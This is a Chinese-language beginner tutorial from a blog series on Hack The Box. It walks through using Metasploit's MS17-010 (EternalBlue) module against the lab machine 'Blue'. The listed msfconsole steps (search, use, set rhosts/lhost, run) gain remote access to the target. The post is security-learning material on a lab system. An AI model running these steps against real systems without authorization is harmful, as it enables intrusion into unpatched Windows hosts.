iT邦幫忙

2023 iThome 鐵人賽

DAY 11
0
Security

入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用系列 第 11

[Day 11]自動化攻擊腳本-Metasploit(Automatic exploitation tool-Metasploit)

  • 分享至 

  • xImage
  •  

前言

上一篇我所介紹的工具searchsploit已經能夠協助滲透工程師進行滲透測試,接著要介紹的是讓門外漢也能上手的metasploit,不像searchsploit需要理解程式語言背後的用意,metasploit裡有許多腳本(script)能夠讓各位使用,只需要了解輸入有哪些是要求壹定要設置的,哪些是可以使用預設值的,那我們就開始利用HTB的靶機說明。

正文

這個範例使用靶機Blue解釋,先利用nmap找出smb的漏洞。

結果顯示ms17-010的漏洞是我們可以利用的,在metasploit搜尋ms17-010的漏洞。

msfconsole
search ms17-010

如果想搜尋相關字的弱點,輸入為msfconsole後,輸入search [keyword]即可。

有幾個漏洞是與ms17-010相關,我們將使用第一個,輸入use [編號]就可以了,在此我們是使用0個。

use 0
show options

接著我們來看一下有哪些參數可以設置,大部分的值都有預設值,在這裡我們的rhost(目標主機)以及lhost(本地主機)都需要修改,其他的port可以不用修改。

set rhosts [target ip]
set lhost [your ip]
run

如果要修改參數時,輸入set [變數名稱] [值]就可以了。這樣我們就取得權限了。

最後來總結一下metasploit能夠使用的指令有哪些

  • search搜尋相關的漏洞
  • use指定使用哪個腳本
  • show options秀出能夠設置的參數
  • set修改參數
  • run執行腳本

今天我的介紹到此結束,謝謝
/images/emoticon/emoticon41.gif


上一篇
[Day 10]攻擊腳本搜尋工具-searchsploit (Exploitation tool-searchsploit)
下一篇
[Day 12] 網頁應用安全測試-Burp Suite(Web application security testing-Burp Suite))
系列文
入門級資安實戰:以Hack The Box為輔學習網路漏洞掃描與利用25
圖片
  直播研討會
圖片
{{ item.channelVendor }} {{ item.webinarstarted }} |
{{ formatDate(item.duration) }}
直播中

尚未有邦友留言

立即登入留言